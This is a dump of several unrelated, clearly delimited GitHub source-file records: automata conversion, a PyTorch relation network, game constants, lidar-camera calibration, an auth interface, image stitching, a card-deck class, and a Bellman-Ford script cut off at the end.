'E7')], 'E3': [('c', 'E8'), ('c', 'E9')], 'E4': [('b', 'E5'), ('b', 'E6'), ('b', 'E7')], 'E5': [('c', 'E8'), ('c', 'E9')], 'E6': [('c', 'E8'), ('c', 'E9')], 'E7': [('c', 'E8'), ('c', 'E9')], 'E8': [], 'E9': []}\r\n#estados_iniciais = ['E1']\r\n#estados_finais = ['E9']\r\n#exemplo_afn = AFN(delta, estados_iniciais, 
estados_finais)\n#afnToAFD(exemplo_afn)\n","repo_name":"compilers-uff/expressoes-regulares-victorguarana","sub_path":"afnToAFD.py","file_name":"afnToAFD.py","file_ext":"py","file_size_in_byte":4677,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13751345947","text":"import numpy as np\nimport itertools\n\nimport torch\nimport torch.nn as nn\nfrom torch.nn.modules.module import Module\n\n\nclass CRN(Module):\n def __init__(self, module_dim, num_objects, max_subset_size, gating=False, spl_resolution=1):\n super(CRN, self).__init__()\n self.module_dim = module_dim\n self.gating = gating\n\n self.k_objects_fusion = nn.ModuleList()\n if self.gating:\n self.gate_k_objects_fusion = nn.ModuleList()\n for i in range(min(num_objects, max_subset_size + 1), 1, -1):\n self.k_objects_fusion.append(nn.Linear(2 * module_dim, module_dim))\n if self.gating:\n self.gate_k_objects_fusion.append(nn.Linear(2 * module_dim, module_dim))\n self.spl_resolution = spl_resolution\n self.activation = nn.ELU()\n self.max_subset_size = max_subset_size\n\n def forward(self, object_list, cond_feat):\n \"\"\"\n :param object_list: list of tensors or vectors\n :param cond_feat: conditioning feature\n :return: list of output objects\n \"\"\"\n scales = [i for i in range(len(object_list), 1, -1)]\n\n relations_scales = []\n subsample_scales = []\n for scale in scales:\n relations_scale = self.relationset(len(object_list), scale)\n relations_scales.append(relations_scale)\n subsample_scales.append(min(self.spl_resolution, len(relations_scale)))\n\n crn_feats = []\n if len(scales) > 1 and self.max_subset_size == len(object_list):\n start_scale = 1\n else:\n start_scale = 0\n for scaleID in range(start_scale, min(len(scales), self.max_subset_size)):\n idx_relations_randomsample = np.random.choice(len(relations_scales[scaleID]),\n subsample_scales[scaleID], replace=False)\n mono_scale_features = 0\n for id_choice, idx in enumerate(idx_relations_randomsample):\n clipFeatList = [object_list[obj].unsqueeze(1) for obj in relations_scales[scaleID][idx]]\n # g_theta\n g_feat = torch.cat(clipFeatList, dim=1)\n g_feat = g_feat.mean(1)\n if len(g_feat.size()) == 2:\n h_feat = torch.cat((g_feat, cond_feat), dim=-1)\n elif len(g_feat.size()) == 3:\n cond_feat_repeat = cond_feat.repeat(1, g_feat.size(1), 1)\n h_feat = torch.cat((g_feat, cond_feat_repeat), dim=-1)\n if self.gating:\n h_feat = self.activation(self.k_objects_fusion[scaleID](h_feat)) * torch.sigmoid(\n self.gate_k_objects_fusion[scaleID](h_feat))\n else:\n h_feat = self.activation(self.k_objects_fusion[scaleID](h_feat))\n mono_scale_features += h_feat\n crn_feats.append(mono_scale_features / len(idx_relations_randomsample))\n return crn_feats\n\n def relationset(self, num_objects, num_object_relation):\n return list(itertools.combinations([i for i in range(num_objects)], num_object_relation))\n","repo_name":"thaolmk54/hcrn-videoqa","sub_path":"model/CRN.py","file_name":"CRN.py","file_ext":"py","file_size_in_byte":3146,"program_lang":"python","lang":"en","doc_type":"code","stars":125,"dataset":"github-code","pt":"53"} +{"seq_id":"30500975203","text":"WINDOW_WIDTH = 350\nWINDOW_HEIGHT = 650\n\nBLACK_COLOR = (0, 0, 0)\nWHITE_COLOR = (255, 255, 255)\n\nBIRD_PATH = 'photos/bird.JPG'\nBIRD_WIDTH = 30\nBIRD_HEIGHT = 30\nBIRD_START_POS_X = 170\nBIRD_START_POS_Y = 320\nBIRD_SPEED_X = 4\n\nACCELERATION_SIZE = 0.3\nJUMP_SPEED = -7\n\nSTART_TEXT = 'Press space to play!'\nSTART_TEXT_FONT = 'Ariel'\nSTART_TEXT_SIZE = 
30\nSTART_TEXT_POS_X = 70\nSTART_TEXT_POS_Y = 50\n\nEND_TEXT = 'Better luck next time!'\nEND_TEXT_FONT = 'Ariel'\nEND_TEXT_SIZE = 30\nEND_TEXT_POS_X = 70\nEND_TEXT_POS_Y = 50\n\nSCORE_TEXT = 'SCORE: '\nSCORE_TEXT_FONT = 'Ariel'\nSCORE_TEXT_SIZE = 30\nSCORE_TEXT_POS_X = 120\nSCORE_TEXT_POS_Y = 90\n\nSPIKE_PATH = 'photos/spike.JPG'\nSPIKE_WIDTH = 40\nSPIKE_HEIGHT = 10\nSPIKES_NUM = 3\n\nSCORE_ADDITION = SPIKES_NUM\n\nBEST_SCORE_FILE_PATH = 'files/best_score.txt'\nBEST_SCORE_TEXT = 'BEST SCORE: '\nBEST_SCORE_TEXT_FONT = 'Ariel'\nBEST_SCORE_TEXT_SIZE = 20\nBEST_SCORE_TEXT_POS_X = 120\nBEST_SCORE_TEXT_POS_Y = 600\n\nBONUS_PATH = 'photos/bonus.JPG'\nBONUS_WIDTH = 20\nBONUS_HEIGHT = 20\nBONUS_ADDITION = 10\n","repo_name":"adirb151/BirdyGame","sub_path":"constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":1019,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34739449447","text":"#!/usr/bin/env python\nfrom typing import List, Tuple\n\nimport numpy as np\nfrom liegroups.numpy import SE3\nfrom scipy.optimize import least_squares\n\nfrom .types import Array, Plane\n\ntry:\n from typing import Literal # type: ignore\nexcept ImportError:\n from typing_extensions import Literal\n\n__all__ = [\"optimize\"]\n\n\ndef _optimize_func(\n pose_se3, points: Array[Tuple[int, Literal[3]], float], plane_coefficients: Array[Tuple[int, Literal[4]], float]\n) -> Array[Tuple[int], float]:\n transformed_points = SE3.exp(pose_se3).dot(points)\n return (np.sum(transformed_points * plane_coefficients[:, :3], axis=1) + plane_coefficients[:, 3]) * (\n plane_coefficients[:, 4] ** -1\n )\n\n\ndef optimize(\n all_planes_lidar: List[Plane],\n all_planes_camera: List[Plane],\n):\n assert len(all_planes_lidar) == len(all_planes_camera)\n\n initial_transformation_mat = _direct_linear_optimize(all_planes_lidar, all_planes_camera)\n\n initial_pose_SE3 = SE3.from_matrix(initial_transformation_mat, normalize=True)\n initial_guess_se3 = initial_pose_SE3.log()\n plane_coefficients, points = _prepare_data(all_planes_lidar, all_planes_camera)\n\n res_lsq = least_squares(_optimize_func, initial_guess_se3, args=(points, plane_coefficients), loss=\"cauchy\")\n\n return SE3.exp(res_lsq.x)\n\n\ndef _direct_linear_optimize(\n all_planes_lidar: List[Plane],\n all_planes_camera: List[Plane],\n):\n\n Rcl = _direct_linear_optimize_rot(all_planes_lidar, all_planes_camera)\n trans = _direct_linear_optimize_trans(all_planes_lidar, all_planes_camera, Rcl)\n transformation_mat = np.eye(4)\n transformation_mat[:3, :3] = Rcl\n transformation_mat[:3, 3] = trans.squeeze()\n\n return transformation_mat\n\n\ndef _prepare_data(all_planes_lidar: List[Plane], all_planes_camera: List[Plane]):\n num_pairs = len(all_planes_lidar)\n num_points = 0\n for i in np.arange(num_pairs):\n num_points += len(all_planes_lidar[i].projections)\n\n planes_camera_coefficients = np.zeros((num_points, 5))\n all_lidar_points = np.zeros((num_points, 3))\n\n count = 0\n for i in np.arange(num_pairs):\n cur_num_points = len(all_planes_lidar[i].projections)\n all_lidar_points[count : count + cur_num_points, :] = all_planes_lidar[i].projections\n planes_camera_coefficients[count : count + cur_num_points, :4] = np.tile(\n all_planes_camera[i].coefficients, cur_num_points\n ).reshape(-1, 4)\n planes_camera_coefficients[count : count + cur_num_points, 4] = np.ones(cur_num_points) * cur_num_points\n count += cur_num_points\n\n return planes_camera_coefficients, all_lidar_points\n\n\ndef 
_direct_linear_optimize_rot(\n    all_planes_lidar: List[Plane], all_planes_camera: List[Plane]\n) -> Array[Tuple[Literal[3], Literal[3]], float]:\n    num_pairs = len(all_planes_lidar)\n    all_planes_lidar_normals = np.zeros((num_pairs * 2, 3), dtype=np.float64)\n    all_planes_camera_normals = np.zeros_like(all_planes_lidar_normals)\n    for i in np.arange(num_pairs):\n        all_planes_lidar_normals[i] = all_planes_lidar[i].coefficients[:3]\n        all_planes_camera_normals[i] = all_planes_camera[i].coefficients[:3]\n\n    H = all_planes_lidar_normals.T @ all_planes_camera_normals\n    u, s, vh = np.linalg.svd(H)\n    Rcl = vh.T @ u.T\n\n    return Rcl\n\n\ndef _direct_linear_optimize_trans(\n    all_planes_lidar: List[Plane],\n    all_planes_camera: List[Plane],\n    Rcl: Array[Tuple[Literal[3], Literal[3]], float],\n):\n    planes_camera_coefficients, all_lidar_points = _prepare_data(all_planes_lidar, all_planes_camera)\n\n    A = planes_camera_coefficients[:, :3]\n    rot_points = Rcl @ all_lidar_points.T\n    rot_points = rot_points.T\n    b = np.sum(planes_camera_coefficients[:, :3] * rot_points, axis=1) + planes_camera_coefficients[:, 3]\n    b *= -1\n    result = np.linalg.lstsq(A, b.reshape(-1, 1), rcond=None)\n    trans = result[0]\n\n    return trans\n","repo_name":"xmba15/lidar_camera_calibration_point_to_plane","sub_path":"lidar_camera_calibration/point_to_plane_optimization.py","file_name":"point_to_plane_optimization.py","file_ext":"py","file_size_in_byte":3897,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"53"} +{"seq_id":"33189245597","text":"import abc\nfrom typing import Optional\n\nfrom app.domain.users.entities import SessionUser, User\nfrom .entities import LoginInputDTO, TokenDataDTO\n\n\nclass AuthServiceInterface(metaclass=abc.ABCMeta):\n    \"\"\"interface for the authentication service\"\"\"\n\n    @abc.abstractmethod\n    async def authenticate_user(self, input: LoginInputDTO) -> TokenDataDTO:\n        \"\"\"authenticate user via email and password and return auth token\"\"\"\n        raise NotImplementedError\n\n    @abc.abstractmethod\n    def get_token(self, user: User) -> str:\n        \"\"\"return token data for user\"\"\"\n        raise NotImplementedError\n\n    @abc.abstractmethod\n    def get_session_user_from_token(self, request) -> Optional[SessionUser]:\n        \"\"\"return SessionUser from request\"\"\"\n        raise NotImplementedError\n","repo_name":"tbleicher/clean-architecture-python","sub_path":"src/app/domain/auth/interfaces.py","file_name":"interfaces.py","file_ext":"py","file_size_in_byte":761,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"41444293382","text":"import numpy as np\nimport cv2\nsift = cv2.xfeatures2d.SIFT_create() # Calling the SIFT algorithm\n\n#IMAGES MUST ALREADY BE SUPPLIED AS THE TWO HALVES THAT WILL BE COMBINED\nclass Stitcher:\n#    def __init__(self):\n#        self.isv3 = imutils.is_cv3()\n    #Checks which CV version is being used, as there are large differences between the versions\n    \n    # unpack the images, then detect keypoints and extract\n\t # local invariant descriptors from them\n    #images is a list of (two) images that we are going to stitch together to form the panorama\n    #reprojThresh is the maximum pixel “wiggle room” allowed by the RANSAC algorithm, like a deadband\n    def stitch(self,images,ratio=0.75,reprojThresh=10,showMatches=False):\n        (image_left,image_right)=images\n        (X_left,Y_left)=self.detectAndDescribe(image_left)\n        (X_right,Y_right)=self.detectAndDescribe(image_right)\n        #The ordering of the images list is important: we expect images to be supplied in left-to-right order.\n        #Match features of the two images\n        #OR GENERATE A CRITICAL VALUE FOR M TO FIND THE BEST IMAGE QUALITY\n        for i in range(10):\n            M=self.matchKeypoints(X_left,X_right,Y_left,Y_right)\n        if M is None:\n            print(\"Not Enough matching points found\")\n            return None\n        # MATCHES is the list of matched keypoint index pairs\n        # STATUS a list of indexes to indicate which keypoints in matches were successfully spatially verified using RANSAC.\n        (matches, H, status) = M\n        # Shape of the output image is the sum of the widths of both images, using the height of the second image\n        result = cv2.warpPerspective(image_left, H,(image_left.shape[1] + image_right.shape[1], image_left.shape[0]))\n        # HERE the image_left variable actually holds the right-hand image \n        result[0:image_right.shape[0], 0:image_right.shape[1]] = image_right\n        \n# check to see if the keypoint matches should be visualized\n        if showMatches:\n            vis = self.drawMatches(image_left, image_right, X_left, X_right, matches,status)\n            return (result,vis)\n        return result #This is what the function returns\n    \n# Method accepts an image, then detects keypoints and extracts local invariant descriptors\n    def detectAndDescribe(self, image):\n        # detect and extract features from the image\n        descriptor = cv2.xfeatures2d.SIFT_create()\n        (kps, features) = descriptor.detectAndCompute(image, None)\n        # convert the keypoints from KeyPoint objects to NumPy arrays\n        kps = np.float32([kp.pt for kp in kps])\n        return (kps, features)\n    \n    def matchKeypoints(self,X_left,X_right,Y_left,Y_right,ratio=0.75,reprojThresh=10):\n        # compute the raw matches and initialize the list of actual matches\n        matcher = cv2.DescriptorMatcher_create(\"BruteForce\")\n        #performs k-NN matching between the two feature vector sets using k=2 \n        #(indicating the top two matches for each feature vector are returned)\n        #The reason we want the top two matches rather than just the top one match is because \n        #we need to apply David Lowe’s ratio test for false-positive match pruning\n        rawMatches = matcher.knnMatch(Y_left, Y_right, 2)\n        matches=[]\n        #loop over the matches\n        for m in rawMatches:\n            # ensure the distance is within a certain ratio of each other\n            #Lowe’s ratio test, which is used to determine high-quality feature matches. \n            #Typical values for Lowe’s ratio are normally in the range [0.7, 0.8].\n            if len(m) == 2 and m[0].distance < m[1].distance * ratio:\n                matches.append((m[0].trainIdx, m[0].queryIdx))\n        \n        # Computing a homography between two sets of points requires at a bare minimum\n        # an initial set of four matches. For a more reliable homography estimation, \n        # we should have substantially more than just four matched points\n        if len(matches)>4:\n            # construct the two sets of points\n            ptsA = np.float32([X_left[i] for (_, i) in matches])\n            ptsB = np.float32([X_right[i] for (i, _) in matches])\n            \n            # compute the homography between the two sets of points\n            (H, status) = cv2.findHomography(ptsA, ptsB, cv2.RANSAC,reprojThresh)\n            # return the matches along with the homography matrix and status of each matched point\n            return (matches, H, status)\n        # not enough matches were found to estimate a homography\n        return None\n    #Used to visualize keypoint correspondences between two images:\n    def drawMatches(self, image_left, image_right, X_left, X_right, matches, status):\n        # initialize the output visualization image\n        (hA, wA) = image_left.shape[:2]\n        (hB, wB) = image_right.shape[:2]\n        vis = np.zeros((max(hA, hB), wA + wB, 3), dtype=\"uint8\")\n        vis[0:hA, 0:wA] = image_left\n        vis[0:hB, wA:] = image_right\n\n        # loop over the matches\n        for ((trainIdx, queryIdx), s) in zip(matches, status):\n            if s == 1:\n                ptA = (int(X_left[queryIdx][0]), int(X_left[queryIdx][1]))\n                ptB = (int(X_right[trainIdx][0]) + wA, int(X_right[trainIdx][1]))\n                cv2.line(vis, ptA, ptB, (0, 255, 0), 1)\n        return vis","repo_name":"RonakSharma1/Image_Stitching","sub_path":"ImageStitching.py","file_name":"ImageStitching.py","file_ext":"py","file_size_in_byte":5211,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"15749157834","text":"\"\"\"\nContains the code for Deck_Cards\nwill be used in many card games in parent folder (eventually)\nby: patjcolon\nLast updated: 6/28/2023\n\"\"\"\nfrom random import shuffle, choice\nfrom helper_modules import styl\n\nrst = styl.unstyl()\nyB = styl.styl(\"Yellow\", \"Bold\")\ngB = styl.styl(\"Green\", \"Bold\")\n\n# ysw: \"Red Bold White\"\nreds = styl.styl(\"Red\", \"Bold\", \"White\")\n# ysw: \"Black Bold White\"\nblks = styl.styl(\"Black\", \"Bold\", \"White\")\n\n\nclass Deck_Cards(): # WIP : error handling, card object creation\n    \"\"\"Handles creation, management and deletion of all decks and their contents\"\"\"\n\n# ====================================================================\n# ||   Object Initialization, Deletion, and asString Functions:    ||\n# ====================================================================\n    def __init__(self, starting_decks: int = 1):\n        \"\"\"Creates starting_decks amount of decks, minimum 1.\n        Creates self.card_count and self.number_of_sets for tracking purposes.\"\"\"\n        self.card_count = 0\n        self.number_of_sets = 0\n        self.external_sets_added = 0\n        self.new_deck()\n\n        # Additional starting decks created only at initialization.\n        self.starting_decks = starting_decks\n        extra_decks_left = starting_decks - 1\n        if extra_decks_left > 0:\n            extra_decks_left -= 1\n            self.combine_decks(False, extra_decks_left, False, True)\n            # resetting this value changed by combine decks, as initial decks don't count as external\n            self.external_sets_added = 0\n            extra_decks_left = 0\n\n    def __del__(self):\n        del self.diamonds, self.clubs, self.hearts, self.spades\n        del self.deck\n        del self.card_count\n        del self.number_of_sets\n        del self\n\n    def __str__(self) -> str:\n        return f\"This is a deck containing {self.card_count} cards.\"\n\n# ====================================================================\n# ||                 Object Testing Functions:                      ||\n# ====================================================================\n    def test_deck(self, test_selection: str = \"ALL\", test_cycles: int = 1, deck_combining_test: object = 
False):\n        \"\"\"Tests variables and methods to ensure deck is functioning as intended. Defaults: Running \"ALL\" tests, 1 time, with a random new deck used in the combination\n        test_selection Options: \"ALL\", \"CURRENT\", \"NEW\", \"CLEAR\", \"COMBINE\", \"SHUFFLE\", \"RANDOM\"\n            \"ALL\": Performs all tests\n            \"CURRENT\": Performs tests on deck as is\n            \"NEW\": Runs self.new_deck and performs tests on new deck\n            \"CLEAR\": Runs self.clear_deck and performs tests on cleared deck\n            \"COMBINE\": Runs self.combine_decks and performs tests on combination deck\n            \"SHUFFLE\": Runs self.shuffle_deck and performs tests on shuffled deck\n            \"RANDOM\": Runs one of the above tests chosen at random\n        test_cycles: Repeats the selected test this many times\n        deck_combining_test: deck that will be used in self.combine_decks. If True: use new_deck in combination. If False: do not combine a deck; default False\"\"\"\n        test_selection = test_selection.upper()\n        self.test_cycles = test_cycles\n        self.tests_ran = 0\n        self.deck_combining_test = deck_combining_test\n        done_testing = False\n\n        def tests_performed():\n            \"\"\"Tests performed in every deck test\"\"\"\n            print(f\"{gB}(Test #1){yB} -----> {rst}\" +\n                  f\"Sets: {self.number_of_sets} Cards: {self.card_count} Starting Decks: {self.starting_decks}\")\n\n            print(f\"{gB}(Test #2){yB} -----> {rst}\" +\n                  f\"Diamonds: {self.diamonds}, Clubs: {self.clubs} Hearts: {self.hearts} Spades: {self.spades}\")\n\n            print(f\"{gB}(Test #3){yB} -----> {rst}\" +\n                  f\"Deck: {self.deck}\")\n            self.tests_ran += 1\n            print(f\"\\n{yB}+-{gB}< Test Cycle #{self.tests_ran} DONE >{yB}--------------------------------------+{rst}\\n\\n\")\n\n        def current_deck_tests():\n            \"\"\"Performs tests on current deck as is\"\"\"\n            print(\n                f\"{yB}--------------------------------------------------------------------\")\n            print(\n                f\"| -{rst}(CURRENT DECK STATS){yB}-----                                    |\")\n            print(\n                f\"--------------------------------------------------------------------{rst}\")\n            tests_performed()\n\n        def new_deck_tests():\n            \"\"\"Runs self.new_deck and performs tests on new deck\"\"\"\n            print(\n                f\"{yB}--------------------------------------------------------------------\")\n            print(\n                f\"| -{rst}(NEW DECK STATS){yB}-----                                        |\")\n            print(\n                f\"--------------------------------------------------------------------{rst}\")\n            self.new_deck()\n            tests_performed()\n\n        def clear_deck_tests():\n            \"\"\"Runs self.clear_deck and performs tests on cleared deck\"\"\"\n            print(\n                f\"{yB}--------------------------------------------------------------------\")\n            print(\n                f\"| -{rst}(CLEAR DECK STATS){yB}-----                                      |\")\n            print(\n                f\"--------------------------------------------------------------------{rst}\")\n            self.clear_deck()\n            tests_performed()\n\n        def combine_decks_tests(deck_combining_test: object = self.deck_combining_test):\n            \"\"\"Runs self.combine_decks and performs tests on combination deck\"\"\"\n            print(\n                f\"{yB}--------------------------------------------------------------------\")\n            print(\n                f\"| -{rst}(COMBINE DECKS STATS){yB}-----                                   |\")\n            print(\n                f\"--------------------------------------------------------------------{rst}\")\n            self.combine_decks(deck_combining_test)\n            tests_performed()\n\n        def shuffle_deck_tests():\n            \"\"\"Runs self.shuffle_deck and performs tests on shuffled deck\"\"\"\n            print(\n                f\"{yB}--------------------------------------------------------------------\")\n            print(\n                f\"| -{rst}(SHUFFLE DECK STATS){yB}-----                                    |\")\n            print(\n                f\"--------------------------------------------------------------------{rst}\")\n            self.shuffle_deck()\n            tests_performed()\n\n        def random_deck_test():\n            \"\"\"Runs any style 
test at random\"\"\"\n choice(self.all_tests_list)()\n\n def run_all_tests():\n \"\"\"Performs all tests in random order\"\"\"\n print(\n f\"{yB}====================================================================\")\n print(\n f\"|| ={gB}[ RUNNING ALL DECK TESTS ]{yB}===== ||\")\n print(\n f\"===================================================================={rst}\")\n all_tests_list = self.all_tests_list\n number_of_tests = len(all_tests_list)\n\n while number_of_tests > 0:\n number_of_tests -= 1\n random_test = choice(all_tests_list)\n random_test()\n all_tests_list.remove(random_test)\n\n # Used in run_all_tests and random_deck_test\n self.all_tests_list = [current_deck_tests, new_deck_tests,\n clear_deck_tests, combine_decks_tests, shuffle_deck_tests]\n # Runs test selected for as many intervals as specified:\n while test_cycles > 0:\n test_cycles -= 1\n done_testing = False\n if test_selection == \"ALL\": # Runs all deck tests in random order\n run_all_tests()\n elif test_selection == \"CURRENT\": # Runs current deck tests\n current_deck_tests()\n elif test_selection == \"NEW\": # Runs new deck tests\n new_deck_tests()\n elif test_selection == \"CLEAR\": # Runs clear deck tests\n clear_deck_tests()\n elif test_selection == \"COMBINE\": # Runs combine decks tests\n combine_decks_tests()\n elif test_selection == \"SHUFFLE\": # Runs shuffle deck tests\n shuffle_deck_tests()\n elif test_selection == \"RANDOM\": # Runs a randomly selected deck tests function\n random_deck_test()\n else: # test_selection not listed - breakout of cycles loop\n print(\"Test selection invalid. Terminating testing objects.\")\n test_cycles = 0\n # Testing complete, call objects cleanup\n done_testing = True\n\n # Testing objects cleanup\n if done_testing:\n del self.test_cycles\n del self.tests_ran\n del self.deck_combining_test\n return print(\"Testing completed. Testing objects deleted.\")\n # Testing cleanup failed\n return print(\"Testing cleanup failed to run.\")\n\n\n# ====================================================================\n# || Deck Management Functions: ||\n# ====================================================================\n\n def new_deck(self):\n \"\"\"Declares/Resets self.deck and a self.suit for diamonds, clubs, hearts, and spades.\n Declares: Used when initialized to create values and new deck.\n Resets: Can be manually called at any point to reset deck to 1 fresh, unshuffled deck of 52 cards.\"\"\"\n self.deck = []\n self.diamonds = [\"AD\", \"2D\", \"3D\", \"4D\", \"5D\", \"6D\",\n \"7D\", \"8D\", \"9D\", \"10D\", \"JD\", \"QD\", \"KD\"]\n self.clubs = [\"AC\", \"2C\", \"3C\", \"4C\", \"5C\", \"6C\",\n \"7C\", \"8C\", \"9C\", \"10C\", \"JC\", \"QC\", \"KC\"]\n self.hearts = [\"AH\", \"2H\", \"3H\", \"4H\", \"5H\", \"6H\",\n \"7H\", \"8H\", \"9H\", \"10H\", \"JH\", \"QH\", \"KH\"]\n self.spades = [\"AS\", \"2S\", \"3S\", \"4S\", \"5S\", \"6S\",\n \"7S\", \"8S\", \"9S\", \"10S\", \"JS\", \"QS\", \"KS\"]\n self.deck.extend(self.diamonds + self.clubs +\n self.hearts + self.spades)\n self.card_count = 52\n self.number_of_sets = 1\n\n def clear_deck(self):\n \"\"\"Clears every list and sets every value to 0. 
Does not delete object.\"\"\"\n        self.deck.clear()\n        self.diamonds.clear()\n        self.clubs.clear()\n        self.hearts.clear()\n        self.spades.clear()\n        self.card_count = 0\n        self.number_of_sets = 0\n\n    def shuffle_deck(self):\n        \"\"\"Shuffles self.deck using random.shuffle()\"\"\"\n        shuffle(self.deck)\n\n    def combine_decks(self, other_deck: object = False, extra_decks: int = 0, shuffle_decks: bool = True, create_new_deck: bool = False):\n        \"\"\"Takes other_deck.deck and combines it to this deck.\n\n        For every 1 in extra_decks: runs combine_decks again (defaulting to new_deck)\n        Ex: combine_decks(deck2, 3) will first combine self.deck and deck2, then it will add 3 more new decks, shuffling each time.\n\n        Will shuffle_deck() if shuffle_decks is True, otherwise will add new decks to bottom.\n\n        If create_new_deck True, creates a new deck to combine instead.\n        Default is False. If no deck is entered, switches to True\"\"\"\n        if not other_deck:\n            create_new_deck = True\n        if create_new_deck:\n            del other_deck\n            other_deck = Deck_Cards()\n\n        self.deck.extend(other_deck.deck)\n        self.diamonds.extend(other_deck.diamonds)\n        self.clubs.extend(other_deck.clubs)\n        self.hearts.extend(other_deck.hearts)\n        self.spades.extend(other_deck.spades)\n\n        self.card_count = len(self.deck)\n        self.number_of_sets += other_deck.number_of_sets  # the other deck may itself hold several sets\n        self.external_sets_added += 1\n        del other_deck\n\n        if shuffle_decks:\n            self.shuffle_deck()\n        if extra_decks > 0:\n            extra_decks -= 1\n            self.combine_decks(False, extra_decks, shuffle_decks, True)\n\n# TODO: combine_hands()\n\n# ====================================================================\n# ||                    Card Management Functions:                  ||\n# ====================================================================\n    def remove_card(self, card_removed: str):\n        \"\"\"Helper function to update self.deck and suits\"\"\"\n        self.deck.remove(card_removed)\n        self.card_count -= 1\n\n        card_suit = card_removed[-1]\n        if card_suit == 'D':\n            self.diamonds.remove(card_removed)\n\n        elif card_suit == 'C':\n            self.clubs.remove(card_removed)\n\n        elif card_suit == 'H':\n            self.hearts.remove(card_removed)\n\n        elif card_suit == 'S':\n            self.spades.remove(card_removed)\n\n    def draw(self, draw_type: str = \"TOP\", peek: bool = False):\n        \"\"\"Draws a card. draw_type selects \"TOP\", \"BOTTOM\", \"RANDOM\", a suit name, or a specific card.\"\"\"\n        draw_type = draw_type.upper()\n\n        def specific_card(specific_card: str = '') -> str:\n            \"\"\"Returns specific card if in deck, updates self.deck and suits\n            Returns False if card not in deck.\"\"\"\n            if self.card_count == 0:\n                print(\"There are no cards left.\")\n                return False\n            elif specific_card in self.deck:\n                if self.card_count == 1:\n                    print(f\"This is the last card in the deck.\")\n                self.remove_card(specific_card)\n                return specific_card\n            elif specific_card:\n                print(\"Card is not in deck.\")\n                return False\n            print(\"What card would you like?\")\n            return False\n\n        def from_top(peek: bool = False) -> str:\n            \"\"\"Returns card from top of deck, updates self.deck and suits\n            peek: Does not remove card if True (default False)\"\"\"\n            if self.card_count == 0:\n                print(\"There are no cards left.\")\n                return False\n            drawn_card = self.deck[0]\n            if self.card_count == 1:\n                print(f\"This is the last card in the deck.\")\n            if not peek:\n                self.remove_card(drawn_card)\n            return drawn_card\n\n        def from_bottom(peek: bool = False) -> str:\n            \"\"\"Returns card from bottom of deck, updates self.deck and suits\n            peek: Does not remove card if True (default False)\"\"\"\n            if self.card_count == 0:\n                print(\"There are 
no cards left.\")\n return False\n drawn_card = self.deck[-1]\n if self.card_count == 1:\n print(f\"This is the last card in the deck.\")\n if not peek:\n self.remove_card(drawn_card)\n return drawn_card\n\n def from_random(peek: bool = False) -> str:\n \"\"\"Returns card from random location in deck, updates self.deck and suits\n peek: Does not remove card if True (default False)\"\"\"\n if self.card_count == 0:\n print(\"There are no cards left.\")\n return False\n drawn_card = choice(self.deck)\n if self.card_count == 1:\n print(f\"This is the last card in the deck.\")\n if not peek:\n self.deck.remove(drawn_card)\n return drawn_card\n\n def from_diamonds(peek: bool = False) -> str:\n \"\"\"Returns card from random location in diamonds, updates self.deck and suits\n peek: Does not remove card if True (default False)\"\"\"\n if self.card_count == 0:\n print(\"There are no cards left.\")\n return False\n drawn_card = choice(self.diamonds)\n if not peek:\n self.remove_card(drawn_card)\n return drawn_card\n\n def from_clubs(peek: bool = False) -> str:\n \"\"\"Returns card from random location in clubs, updates self.deck and suits\n peek: Does not remove card if True (default False)\"\"\"\n drawn_card = choice(self.clubs)\n if not peek:\n self.remove_card(drawn_card)\n return drawn_card\n\n def from_hearts(peek: bool = False) -> str:\n \"\"\"Returns card from random location in hearts, updates self.deck and suits\n peek: Does not remove card if True (default False)\"\"\"\n drawn_card = choice(self.hearts)\n if not peek:\n self.remove_card(drawn_card)\n return drawn_card\n\n def from_spades(peek: bool = False) -> str:\n \"\"\"Returns card from random location in spades, updates self.deck and suits\n peek: Does not remove card if True (default False)\"\"\"\n drawn_card = choice(self.spades)\n if not peek:\n self.remove_card(drawn_card)\n return drawn_card\n\n from_where = {\n \"TOP\": from_top,\n \"BOTTOM\": from_bottom,\n \"RANDOM\": from_random,\n \"DIAMONDS\": from_diamonds,\n \"CLUBS\": from_clubs,\n \"HEARTS\": from_hearts,\n \"SPADES\": from_spades\n }\n\n if draw_type not in from_where:\n return specific_card(draw_type)\n return from_where[draw_type]()\n","repo_name":"patjcolon/card_games","sub_path":"classes/decks.py","file_name":"decks.py","file_ext":"py","file_size_in_byte":17440,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"93034929","text":"import math\nfrom prettytable import PrettyTable\n\ndef BellmanFord(adj, start):\n Vsize = len(adj)\n dist = [math.inf] * Vsize\n dist[start] = 0\n for i in range(Vsize - 1):\n for u in range(Vsize):\n for v in range(Vsize):\n if adj[u][v] != 0:\n if dist[u] != math.inf and dist[u] + adj[u][v] < dist[v]:\n dist[v] = dist[u] + adj[u][v]\n return dist\n\n\ncheck = input('Хотите ввести матрицу вручную(Да/Нет)?: ')\nif check == 'Да':\n V = input('Введите названия вершин:\\t').split() # названия вершин\n E = [] # массив рёбер\n eCount = int(input('Введите количество ребер:\\t')) # количество рёбер\n for edge in range(eCount):\n e = input('Введите начало, конец ребра и вес через пробел:\\t').split()\n if len(e) != 3: # проверка ошибок ввода\n print('Неверное количество данных')\n edge -= 1\n continue\n e = {'start': e[0], 'end': e[1], 'weight': int(e[2])}\n E.append(e)\n adjMatrix = [[0 for i in range(len(V))] for i in range(len(V))]\n for edge in E:\n adjMatrix[V.index(edge['start'])][V.index(edge['end'])] = edge['weight']\n adjMatrix[V.index(edge['end'])][V.index(edge['start'])] = 
